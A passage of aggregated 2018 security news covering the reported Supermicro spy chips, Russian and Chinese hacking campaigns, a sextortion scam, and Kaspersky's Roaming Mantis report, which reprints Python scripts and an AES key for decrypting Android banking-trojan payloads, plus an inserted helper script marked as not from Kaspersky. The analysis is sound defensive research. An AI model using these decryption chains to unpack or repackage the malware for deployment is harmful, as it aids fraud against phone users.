“This attack is about as surprising as catching Cookie Monster with his hand in the cookie jar. Compromising digital assets has become industrialized with advanced threats’ careful planning and organization. These threat actors are playing a long game with pre-attacks like these that position themselves for devastating attacks down the road. They are testing their abilities and an organization’s vulnerabilities to see how far they can go. What is surprising is that it has only taken a decade or two for the digital world to become so inter-dependent, not just with hardware but with software; today many systems have so much code in common that any upstream compromise is a widespread threat.
Yes, executives at top companies should be concerned, but they should have been concerned yesterday. CISO’s should operate under the assumption that they have live vulnerabilities on their network at all times because chances are they either have their own Edward Snowden on their hands or are exposed to external adversaries ranging from a basement script kiddie to a nation state-sponsored APT. Monitoring, both deeply and broadly, and useful security analytics that combine different data sources are the only way these kinds of threats will ever be detected or controlled. Companies have to start understanding that they can't sit around and patch their way to a secure network. On a positive note, now that this vulnerability has been detected, it’s going to get harder to fly under the radar because companies will know what to look for.”

Sanjay Beri, CEO, Netskope:

“Chinese cyber infiltration is nothing new, as proven by ongoing recent attacks from elite Chinese institutions diligently working to gain access to assets from the west. Today’s news proves that it’s clear we have exited the honeymoon period created by the deal President Obama struck with President Xi Jinping in back in 2015, where the two pledged that each of their governments would refrain from targeted cyber attacks toward another for commercial gain.

As economic tensions continue to escalate between nation states and the US, organizations -- especially those operating in high-risk sectors such as energy, manufacturing, government, etc. -- need to remain watchful and on high-alert in order to ensure their sensitive data is protected and inaccessible to foreign entities. Given the nature of this attack was at the hardware level, there are bound to be even more complex ramifications of those affected, as these types of breaches are far less simple to rectify than those at the software level.”

Itzik Kotler, CTO and Co-Founder, SafeBreach:

“Like many recent attacks, this is low-level, stealthy, and widespread. The combination of these three makes it especially frightening at first, and it certainly is rare to see such an attack in the wild.

However, no attack is ever a "one and done" operation. Even a compromised server isn't, by itself, a success for an attacker. Stolen data always needs to be retrieved. Or that server needs to be used to download, install, or run further attacks. It's for these reasons that enterprises employ layered defense, or "defense in depth" strategies that try to stop attacks at various points throughout their environment.

We must assume that no security, at any point, is 100% effective - and this attack is just another example. However, with the right layered defense, validated to ensure it's working as intended, even something like a hardware attack doesn't end up becoming a single point of failure.”

Dave Weinstein, VP Threat Research, Claroty:

“While the denials from Apple and Amazon have been relatively unprecedented in their strength and specificity, the reality is that the supply chain – for everything from consumer products, to technology, to heavy machinery – has been a perpetual source of concern for many years as a morass of potential exposure, and one that renders most security tools obsolete.

Regardless of where the claims of the story shake out, there are two immutable facts. First, we have a preponderance of evidence that supply chain compromise is not only possible at multiple levels, it’s happening. Second, China has proven its willingness to pursue advantage by any means necessary, and as the world's de-facto factory of IT components, this is the “high ground” advantage that they are willing to exploit. Likely even more willing given recent developments in trade policy between the U.S. and China.”

Rick Moy, Chief Marketing Officer at Acalvio:

"While there’s a lot of denial about the attacks, it’s completely plausible that China did in fact seed certain hardware with these backdoor chips. One can imagine the liabilities that firms would rather not take on by admitting this kind of a breach. However, it is entirely within the capabilities and mission scope of nation state intel armies to infiltrate supply chains in this way. Although, the ramifications are more serious than embedding malicious software because they could bring wholesale sanctions against the vendors in question, which is what we have been seeing on an informal basis for a while now."

Joseph Carson, chief security scientist at Thycotic:

“We are one step away from a major cyber conflict or retaliation that could result in serious implications. This could be one of the biggest hacks in history. What is clear is that it is a government behind this cyber espionage and I believe it is compromised employees with privileged access that are acting as malicious insiders selecting specific targets so the supply chain has been victim of being compromised. The motive will not be clear until exact details of the hardware chip are reversed to know what it is capable of and who the victims are, since none of Super Micro’s customers are owning up.

It is too early to tell until more evidence is made transparent and any victims own up to this. What is clear is that Super Micro must conduct an Incident Response to determine the actual evidence behind these allegations so that transparency and a motive is revealed and that the nation state behind such compromise can be held responsible.”

Malcolm Harkins, Chief Security and Trust Officer, Cylance:

“Unfortunately the only surprising element about this attack is that it’s taken so long to be uncovered in a report. Supply chain compromise has been a concern for a long time, and there are multiple nation states with endless motivations who make attacks of this scale a certainty rather than a probability.

Adversaries have a wealth of choices of how to execute. From leaving extra bits in software to compromising a validation engineer, the options are endless if the threat actor has the time, money, and capacity. Organizations must combat this by remaining vigilant about where the hardware and software has been. Some software such as the BIOS and firmware is often written by external sources and not the hardware manufacturer. If you have a distrust for the location where it is being created, or are uncertain about the security validation performed, then you need to implement additional validation or in some cases different validation. As evidenced by Meltdown/Spectre, the hardware industry including the semiconductor industry has historically validated technology by testing for the functionality they want to see exist rather than exploring potentially dangerous alternatives that can create harm. Simply put, companies are essentially testing a light switch to see if it turns on and off when it goes up and down, but they’re ignoring the implications of switching it left and right.

Historically speaking, this level of testing has not been done because nobody has demanded it. Extra validation costs extra dollars and slows down time to market. Similar to the age-old Ford Pinto case, organizations are looking at business risks to themselves rather than the risk to the computing ecosystem and therefore society. Until this way of thinking changes, we will continue to see the potential for nation-state exploits such as this one.”

Tim Bandos, Vice President, Cybersecurity, Digital Guardian:

“Given that China manufactures many of the components that go into servers, it would be relatively simple to install and disguise a hidden chip enabling backdoor communications and control with those endpoints. Also, given where these chips reside – lower in the stack – most technologies such as EDR and AV have a visibility gap and wouldn't be able to identify anything being tampered with at the hardware-level. This (once again) demonstrates that determined adversaries have capabilities exceeding that of defenders; hopefully, this will inspire the development of methods and techniques to detect when hardware tampering has taken place. Until then, diversifying supply chain vendors and staying vigilant on outbound and inbound network traffic is highly advised.”

Neelima Rustagi, Senior Director, Product Management, Demisto:

"Although the veracity of the accusations has yet to be confirmed, it highlights a couple of worrying security trends. Firstly, no abstraction layer is safe from attack. While intrusions on the application, OS, and software layer are more visible and get talked about more, attacks that exploit hardware such as the recent Foreshadow attack can be tougher to spot for security tools. Secondly, organizations need to think of ‘supply chain security’ in addition to product/network security. Since product manufacture today straddles nations and industries – each with their own regulations, mores, and political climates – organizations should be cognizant of processes, vendor relationships, and regulatory requirements for each step of the product lifecycle."


DHS Warns of Threats to Precision Agriculture
7.10.2018 securityweek
BigBrothers

Relying on various embedded and connected technologies to improve agricultural and livestock management, precision agriculture is exposed to vulnerabilities and cyber-threats, a new report from the United States Department of Homeland Security (DHS) warns.

The adoption of precision agriculture technology has increased, which has also introduced various cyber risks. By exploiting vulnerabilities in precision agriculture technologies, an attacker could not only access sensitive data and steal resources, but also tamper with or destroy equipment.

Technologies used in precision agriculture “rely on remote sensing, global positioning systems, and communication systems to generate big data, data analytics, and machine learning,” the DHS report (PDF) says.

The findings of the report stem from visits and interviews at large farms and precision agriculture technology manufacturers in the United States. Technologies that allow for a more precise application of agricultural and livestock management inputs (fertilizer, seeds, and pesticides) to lower costs and improve yields also expose the agricultural sector to vulnerabilities, the paper reads.

Cyber threats facing precision agriculture’s embedded and digital tools, however, are consistent with those other connected industries are exposed to as well. The malicious attacks targeting these tools usually have the same purpose too, including data and resource theft, reputation loss, destruction of equipment, or gaining an improper financial advantage over a competitor.

“Therefore, improper use of USB thumb drives, spear-phishing, and other malicious cyber-attacks, are readily available threat vectors for an attack; and the generally accepted mitigation techniques in other industries are largely sufficient for creating a successful defense-in-depth strategy for precision agriculture,” the report notes.

What makes precision agriculture unique, however, is the fact that a highly mechanical labor-intensive industry is now connected online, which dramatically increases the attack surface for threat actors. Thus, threats that would otherwise be viewed as common, “may have unique and far-reaching consequences on the agricultural industry,” the DHS says.

According to the report, precision agriculture isn’t only exposed to cyber-attacks, but also faces dangers such as natural disasters, terrorist attacks, equipment breakdown, or insider threats.

Key threats to the sector include intentional theft of data, intentional publishing of confidential information, access to unmanned aerial system (UAS) data, sale of confidential data, falsification of data for disruption purposes, introduction of rogue data to damage a crop or herd, disruption to positioning, navigation, and timing (PNT) systems, and disruption to communication networks.

The report also lists a series of key controls designed to mitigate the threats: email and browser protections, control over network ports and hardware and software assets, account monitoring, data recovery capabilities, data protection, and incident response and management, among others.

“Adoption of information security standards for precision agriculture is important for the future success of precision agriculture, along with industry efforts for equipment interoperability and data use / privacy. Vetted best practices, borne from hard experience learned in other sectors which have proceeded agriculture in the digital revolution, offer a proven path for data security,” the report reads.


Russian State-Sponsored Operations Begin to Overlap: Kaspersky
7.10.2018 securityweek
BigBrothers

Kaspersky Lab security researchers have uncovered new evidence that shows overlaps between the activity of infamous Russian cyber-espionage groups Turla and Sofacy.

Earlier this year, Kurt Baumgartner, principal security researcher, Kaspersky Lab, revealed that activity associated with the Sofacy group, which is also known as APT28, Fancy Bear, Pawn Storm, Sednit and Strontium, appeared to overlap with that of other state-sponsored operations.

The researcher said at the time that Sofacy’s Zebrocy malware had been discovered on machines also infected with Mosquito, a backdoor previously associated with Turla. The shared victims included organizations in Europe and Asia.

Amid an evolution in the tactics, techniques and procedures (TTPs) employed by the Turla group, also tracked as Snake, Venomous Bear, Waterbug, and Uroboros, Kaspersky Lab has observed further connections with Sofacy, as well as more evidence linking Turla to WhiteBear.

Specifically, the security researchers discovered that Turla’s KopiLuwak malware is employing a delivery mechanism that uses code nearly identical to that previously seen in the Zebrocy operation.

As part of the attack, Turla employed a new spear-phishing delivery vector, relying on Windows shortcut (.LNK) files for malware delivery. The LNK file, Kaspersky discovered, contained PowerShell code almost identical to that used in Zebrocy activity a month earlier.

The investigation also uncovered target overlaps between the two threat actors, focused on sensitive political targets, including government research and security entities, diplomatic missions and military affairs, mainly in central Asia.

The KopiLuwak malware isn’t new, being first associated with the Turla hackers nearly two years ago. In mid-2018, however, the threat actor started using an evolved variant of the malware, targeting entities in Syria and Afghanistan.

KopiLuwak emerged in 2016 as an evolution from IcedCoffee, Turla’s first foray into full-fledged JavaScript backdoors. Focusing on European governments but more selectively deployed, KopiLuwak performs comprehensive system and network reconnaissance, can run arbitrary system commands and uninstalls itself and leaves little evidence for investigators to work with.

In a newly published report, Kaspersky details the discovery and also provides information on the evolution of the KopiLuwak JavaScript backdoor, along with details on the changes observed in the group’s Carbon framework and in the Meterpreter and Mosquito malware delivery techniques.

Turla is expected to continue to update and use the Carbon framework code into 2019 within Central Asia and related remote locations. The group is also expected to use open-source based or inspired fileless components and memory loaders from the Mosquito malware, Kaspersky says.

“It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group,” Kaspersky notes.


US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations
6.10.2018 securityaffairs 
BigBrothers

US DoJ indicted seven defendants working for the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.
The news of the day is that a US DoJ indicted seven defendants working for the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.

The defendants are Aleksei Sergeyevich Morenets, Evgenii Mikhaylovich Serebriakov, Ivan Sergeyevich Yermakov, Artem Andreyevich Malyshev, and Dmitriy Sergeyevich Badin, who work for Military Unit 26165, and GRU officers Oleg Mikhaylovich Sotnikov and Alexey Valerevich Minin.

The hackers were involved in a cyber operation aimed at discrediting the international anti-doping organizations and officials that revealed athlete doping program sustained by Moscow.

The GRU officers hacked into the accounts of officials at the anti-doping organizations to steal confidential data and leak it in order to delegitimize them.

According to prosecutors, defendants also attempted to spread the fake news on doping programs followed by athletes from other countries.

“According to the indictment, beginning in or around December 2014 and continuing until at least May 2018, the conspiracy conducted persistent and sophisticated computer intrusions affecting U.S. persons, corporate entities, international organizations, and their respective employees located around the world, based on their strategic interest to the Russian government.” reads the DoJ press release.

“State-sponsored hacking and disinformation campaigns pose serious threats to our security and to our open society, but the Department of Justice is defending against them,” said Attorney General Jeff Sessions. “Today we are indicting seven GRU officers for multiple felonies each, including the use of hacking to spread the personal information of hundreds of anti-doping officials and athletes as part of an effort to distract from Russia’s state-sponsored doping program. The defendants in this case allegedly targeted multiple Americans and American entities for hacking, from our national anti-doping agency to the Westinghouse Electric Company near Pittsburgh. We are determined to achieve justice in these cases and we will continue to protect the American people from hackers and disinformation.”
The Russian state-sponsored hackers have spread fake news via social media accounts and other infrastructure acquired and maintained by GRU Unit 74455 in Russia.

The cyber spies were operating under the name of a false hacktivist group calling itself the “Fancy Bears’ Hack Team.”

“As part of its influence and disinformation efforts, the Fancy Bears’ Hack Team engaged in a concerted effort to draw media attention to the leaks through a proactive outreach campaign,” continues the press release.

“The conspirators exchanged e-mails and private messages with approximately 186 reporters in an apparent attempt to amplify the exposure and effect of their message.”

The indictments of the seven GRU members are the latest in a string of similar actions against Russian agents involved in hacking activities.

In July, the special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.


DHS issued an alert on attacks aimed at Managed Service Providers
6.10.2018 securityaffairs 
BigBrothers

The United States Department of Homeland Security (DHS) is warning of ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).
The DHS issued an alert on ongoing attacks aimed at global managed service providers (MSPs) that are carried out by an advanced APT group.

Managed services is the practice of outsourcing on a proactive basis certain processes and functions intended to improve operations and cut expenses. It is an alternative to the break/fix or on-demand outsourcing model where the service provider performs on-demand services and bills the customer only for the work done.

The use of MSPs increases the attack surface available to attackers. The DHS alert, TA18-276B, relates to activity uncovered by DHS’ National Cybersecurity and Communications Integration Center (NCCIC) in April 2017.

“The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service providers (MSPs).” reads the alert issued by DHS.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.”

Security firms attributed the attacks to a Chinese threat actor referred to as APT10 (aka menuPass and Stone Panda).


The group has been active since at least 2009. In April 2017, experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

The ANEL malware had already been seen in the previous attack as a beta version or release candidate. In September, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at the Japanese media sector.

The hackers used a broad range of malware in their campaigns, including PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler, and ZeroT.

The DHS alert also provides technical information on detection, response and mitigation for this specific threat.


Experts warns of a new extortion campaign based on the Breach Compilation archive
6.10.2018 securityaffairs 
Spam

Cybaze ZLab spotted a new scam campaign that is targeting some of its Italian customers, crooks leverage credentials in Breach Compilation archive.
Security experts from Cybaze ZLab have spotted a new scam campaign that is targeting some of its Italian customers.

Crooks attempted to monetize the availability of a huge quantity of credentials available in the underground market to target unaware netizens in a new extortion scheme.

The number of spam messages associated with this campaign is rapidly increasing. The attackers behind it used the credentials collected in the infamous database dubbed ‘Breach Compilation’.

The Breach Compilation archive contains about 1.4 billion clear-text credentials gathered in a series of data breaches.

At this time it is still unclear whether the attackers have created a pool of emails used in the spam campaign or are using credential stuffing attacks to access the email accounts of unaware users and use them to send out spam messages.

Credential stuffing attacks involve botnets trying stolen login credentials, usually obtained through phishing attacks and data breaches. This kind of attack is very efficient due to the bad habit of users reusing the same password across multiple services.

The following image shows, as an example, one of the messages used in this campaign.

The message is a classic email scam used by cyber criminals, threatening to reveal to the public that the victim watches porn videos. Crooks claim to have a recording of the victim while watching the videos, but this is absolutely false.

Crooks blackmail the victims and request the payment of a fee in Bitcoin to avoid spreading the video.

To be more convincing and trick victims into paying the fee, the hackers include in the body of the email the password used by the victim as a proof of the attack. This password was extracted from the Breach Compilation archive.

Experts from Cybaze have analyzed several samples of emails belonging to this campaign, most of them in English. One of their customers received a scam message written in poor Italian.

Crooks ask the victims to pay a fee of $3000 worth of Bitcoin, while the message written in Italian asks for $350, a circumstance that suggests that other threat actors are using the same technique.

The attackers may have implemented an automated mechanism to send scam emails to the addresses in the archive and create for each of them a Bitcoin wallet.

Experts from Cybaze have analyzed a couple of wallets associated with the scam messages; in one case they found a number of transactions that suggest victims made the payment.

The Bitcoin address with associated 9 transactions is 1Lughwk11SAsz54wZJ3bpGbNqGfVanMWzk

It is essential to raise awareness about this campaign so that others do not fall victim to this type of extortion.

As usual, let me suggest avoiding the use of the same credentials across multiple web services; you can check whether your email is involved in a data breach by querying the free service


Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system
5.10.2018 Kaspersky
Apple

In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. In the beginning, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, including multiple countries from Asia and beyond, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

You can check previous chapters of this research here:

Roaming Mantis uses DNS hijacking to infect Android smartphones (April 2018)
Roaming Mantis dabbles in mining and phishing multilingually (May 2018)
In addition we would like to thank and credit security researchers from LAC Co. Ltd. for a very insightful article describing how vulnerable routers were compromised by the Roaming Mantis group, which was disclosed in their Japanese blogpost in June 2018. According to this research, the threat actor logged in to their router using default ID and password, and changed legitimate DNS settings to rogue DNS settings, where the router’s control panel was accessible over the Internet.

The Roaming Mantis group did not stop its activities after publication of our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods, such as web crypto mining for iOS devices, spreading via a malicious content delivery system and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

Web crypto-mining for iOS devices
The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

Part of HTML source code of the malicious landing page for iOS

The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

Screen capture of the landing page and CPU monitoring tool

Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

Filtering Japanese devices
One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. A new feature was added to the landing page to filter out Japanese environments:

Added confirmation of Japanese environment for filtering

It looks like they want to slow down infections of Japanese targets for the time being.

Spreading via another malware delivery system
In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “Trojan-Banker.AndroidOS.Wroba.al”, were still being detected by our customers, according to our KSN data.

Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

Our deeper investigation revealed that their new malware spreading method was the one used by other Android malware, the “sagawa.apk” delivery system. We published a Japanese blogpost about this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. According to our previous blogpost, the infection vector involved users receiving a phishing SMS message spoofing a notification from a Japanese delivery company. The message contained a malicious URL. If the user clicked it, the server displayed a fake web site that downloaded and installed the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

Type A
  File name: sagawa.apk
  md5: 956f32a28d0057805c7234d6a13aa99b
  File size: 427KB (437,556)
  Loader module: \classes.dex
  Encrypted payload (enc_data): \assets\a
  Decrypt algorithm: payload = base64_dec(zlib_dec(enc_data));
  Alias: MoqHao (McAfee), XLoader (TrendMicro)
  Old file names: facebook.apk, chrome.apk, ${random}.apk

Type B
  File name: sagawa.apk
  md5: a19f4cb93274c949e66efe13173c95e6
  File size: 2.3MB (2,381,665)
  Loader module: \classes.dex + \lib\arm64-v8a\libkao.so, \lib\armeabi-v7a\libkao.so, \lib\x86\libkao.so, \lib\x86_64\libkao.so
  Encrypted payload (enc_data): \assets\code.so
  Decrypt algorithm: aes_key = base64_dec(hardcoded data); payload = AES_dec(enc_data, aes_key);
  Alias: FAKESPY (TrendMicro)
  Old file name: sagawa.apk

Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

Japanese messages displayed to infected users

In addition, this malware confirms whether a domestic Japanese prepaid card application is installed on the infected device.

Check for the domestic Japanese prepaid card application “Au Wallet”

If the application is installed on the device, the malware downloads and installs a fake application as its update.

Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

Researchers may use the following simplified python scripts to extract the payload from “sagawa.apk”:

sagawa.apk_typeA_payload_extractor.py

#!/usr/bin/env python

import sys
import zlib
import base64

# Type A chain: the encrypted payload (\assets\a) is zlib-compressed base64 text.
data = open(sys.argv[1], "rb").read()
dec_z = zlib.decompress(data)
dec_b = base64.b64decode(dec_z)

# The result is the dex payload; write it next to the input file.
with open(sys.argv[1] + ".dec", "wb") as fp:
    fp.write(dec_b)
sagawa.apk_typeB_payload_extractor.py

#!/usr/bin/env python

import sys
from Crypto.Cipher import AES
import base64

# Type B chain: the encrypted payload (\assets\code.so) is AES-encrypted with a
# base64-encoded key hardcoded in libkao.so; the key is passed as the second argument.
data = open(sys.argv[1], "rb").read()
key = sys.argv[2]
aes_key = base64.b64decode(key)  # key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so
aes = AES.new(aes_key, AES.MODE_ECB)  # ECB, the mode PyCrypto used by default
dec = aes.decrypt(data)

# The result is the jar payload; write it next to the input file.
with open(sys.argv[1] + ".dec", "wb") as fp:
    fp.write(dec)
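As an added example that is not part of Kaspersky's report, the script below folds both extraction chains from the table into one triage helper: it classifies an APK as Type A or Type B from its ZIP member layout, recovers the Type A payload with the standard library only, and checks that what comes out carries the DEX or JAR magic the table says it should. The Type B AES step is attempted only when pycryptodome is installed; the sample APK builder, its member contents and the placeholder ciphertext are constructed here and are not real malware.

```python
"""Triage helper for the two "sagawa.apk" variants (added example, not Kaspersky's code).

- classify_apk(): Type A vs Type B from the ZIP member layout in the table above
- decode_type_a(): payload = base64_dec(zlib_dec(enc_data)), stdlib only
- decode_type_b(): payload = AES_dec(enc_data, base64_dec(key)), ECB as in the
  original script; runs only when pycryptodome is installed
- payload_kind(): checks the DEX / JAR magic the decrypted payload should carry
"""
import base64
import io
import zipfile
import zlib

DEX_MAGIC = b"dex\n"        # Type A payload is a dex file
ZIP_MAGIC = b"PK\x03\x04"   # Type B payload is a jar (zip) file


def classify_apk(apk_bytes):
    """Return "A", "B" or None from the loader/payload members listed in the table."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = set(z.namelist())
    has_kao = any(n.startswith("lib/") and n.endswith("/libkao.so") for n in names)
    if "assets/code.so" in names and has_kao:
        return "B"
    if "assets/a" in names:
        return "A"
    return None


def decode_type_a(enc_data):
    """Type A chain: zlib-decompress, then base64-decode."""
    return base64.b64decode(zlib.decompress(enc_data))


def decode_type_b(enc_data, b64_key):
    """Type B chain: AES-ECB with the base64-encoded key taken from libkao.so."""
    try:
        from Crypto.Cipher import AES  # pycryptodome, optional dependency
    except ImportError:
        return None
    aes = AES.new(base64.b64decode(b64_key), AES.MODE_ECB)
    return aes.decrypt(enc_data)


def payload_kind(payload):
    """Name the container format by magic bytes; "unknown" means a bad key or wrong chain."""
    if payload.startswith(DEX_MAGIC):
        return "dex"
    if payload.startswith(ZIP_MAGIC):
        return "jar"
    return "unknown"


def extract_payload(apk_bytes, b64_key=None):
    """Return (type, payload_kind, payload); payload is None when it cannot be recovered."""
    kind = classify_apk(apk_bytes)
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        if kind == "A":
            payload = decode_type_a(z.read("assets/a"))
        elif kind == "B" and b64_key:
            payload = decode_type_b(z.read("assets/code.so"), b64_key)
        else:
            payload = None
    return kind, (payload_kind(payload) if payload else None), payload


def build_sample_apk(kind):
    """Constructed sample: a minimal ZIP with the Type A or Type B layout and a fake dex payload."""
    fake_dex = DEX_MAGIC + b"035\x00" + b"\x00" * 60
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"loader stub")
        if kind == "A":
            z.writestr("assets/a", zlib.compress(base64.b64encode(fake_dex)))
        else:
            z.writestr("assets/code.so", b"\x00" * 64)         # placeholder ciphertext
            z.writestr("lib/arm64-v8a/libkao.so", b"loader stub")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read()
    key = sys.argv[2] if len(sys.argv) > 2 else None   # base64 key for Type B
    kind, fmt, payload = extract_payload(data, key)
    print("type:", kind, "payload:", fmt)
    if payload:
        with open(sys.argv[1] + ".dec", "wb") as fp:
            fp.write(payload)
```

A payload that classifies as "unknown" after decryption is the quickest sign that the wrong chain or a stale key was used.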
Spreading via prezi.com like a scam
We also observed another malware distribution method of Roaming Mantis which is linked to prezi.com. Prezi is a popular computer application and online service to create dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult video, a game, a comic, music and so on, like pirate editions.

Redirection to a scam page

Based on our research, there were multiple messages leveraging different social engineering tricks to invite users to a scam website. On the other hand, the Roaming Mantis’ landing page was found to be linked to several such accounts carrying out redirections.

Corrupted landing page code from Roaming Mantis posted on prezi.com

However, fortunately this code does not work because of mistakes made during the code preparation stage.

Records of stolen data
Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

Suspected stolen data from victims’ Android devices

This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including cvv, bank information, and secret question and answer in Simplified Chinese. Data headers in Chinese suggest that the attackers are fluent in Chinese – unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate victims’ geography. Below is a pie chart created from the language data:

Victims’ language settings (download)

The top language is “en-us” (39%), the second is “ko-kr”, the third is “ru”. Judging from this data, victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and the new distribution strategies. The reason why the “en-us” is the most popular could be because English is used as second language in several countries.

Conclusions
In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. It seems that the attack doesn’t stop developing. In our recent research, we found that they probed using a web miner for iOS, instead of redirecting to a fake Apple website.

Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

Roaming Mantis is also trying to spread its malware via prezi.com, with a scam that offers a visitor free content such as videos and more.

Judging from the list of stolen credentials, the attackers seem to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe that this is just the tip of the iceberg.

We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

Kaspersky Lab products detect this malware with the following verdict:

HEUR:Trojan-Banker.AndroidOS.Wroba
IoCs


China planted tiny chips on US computers for cyber espionage

5.10.2018 securityaffairs BigBrothers

China used tiny chips implanted on computer equipment manufactured for US companies and government agencies to steal secret information.
According to a report published by Bloomberg News, China used tiny chips implanted on computer equipment manufactured for US companies and government agencies, including Amazon and Apple, to steal secret information.

The tiny chips are the size of a grain of rice; they were discovered during an investigation that started three years ago and is still ongoing.

“Nested on the servers’ motherboards, the testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design. Amazon reported the discovery to U.S. authorities, sending a shudder through the intelligence community.” reads the report.


The tiny chips were used as a “stealth doorway” into computer equipment, a hardware backdoor very hard to detect.

According to unnamed US officials cited in the report, the spying hardware was designed by a unit of the People’s Liberation Army and was inserted into equipment manufactured in China for US-based Super Micro Computer Inc.

Amazon discovered the tiny chips when it acquired software firm Elemental and conducted a security assessment of equipment made for Elemental by California-based Supermicro.

Elemental manufactured equipment for Department of Defense data centers, the CIA’s drone operations, and onboard networks of Navy warships.

“Elemental also started working with American spy agencies. In 2009 the company announced a development partnership with In-Q-Tel Inc., the CIA’s investment arm, a deal that paved the way for Elemental servers to be used in national security missions across the U.S. government.” continues the report.

“Public documents, including the company’s own promotional materials, show that the servers have been used inside Department of Defense data centers to process drone and surveillance-camera footage, on Navy warships to transmit feeds of airborne missions, and inside government buildings to enable secure videoconferencing. NASA, both houses of Congress, and the Department of Homeland Security have also been customers. This portfolio made Elemental a target for foreign adversaries.”

The tiny chips were designed to be implanted directly on the motherboards, the backbone for computer equipment used in data centers of the major US firms.

Amazon confirmed that it was not aware of the supply chain compromise.

“It’s untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental,” Amazon wrote.

Apple denied having found the spy chips on its equipment.

“On this we can be very clear: Apple has never found malicious chips, ‘hardware manipulations’ or vulnerabilities purposely planted in any server,” Apple wrote.


Canada Says it Was Targeted by Russian Cyber Attacks
5.10.2018 securityaffairs
BigBrothers

Canada said Thursday it too was targeted by Russian cyber attacks, citing breaches at its center for ethics in sports and at the Montreal-based World Anti-Doping Agency, after allies blamed Moscow for some of the biggest hacking plots of recent years.

"The government of Canada assesses with high confidence that the Russian military's intelligence arm, the GRU, was responsible" for these cyber attacks, the foreign ministry said in a statement.

Ottawa said these formed "part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order."

And it called on "all those who value this order to come together in its defence."

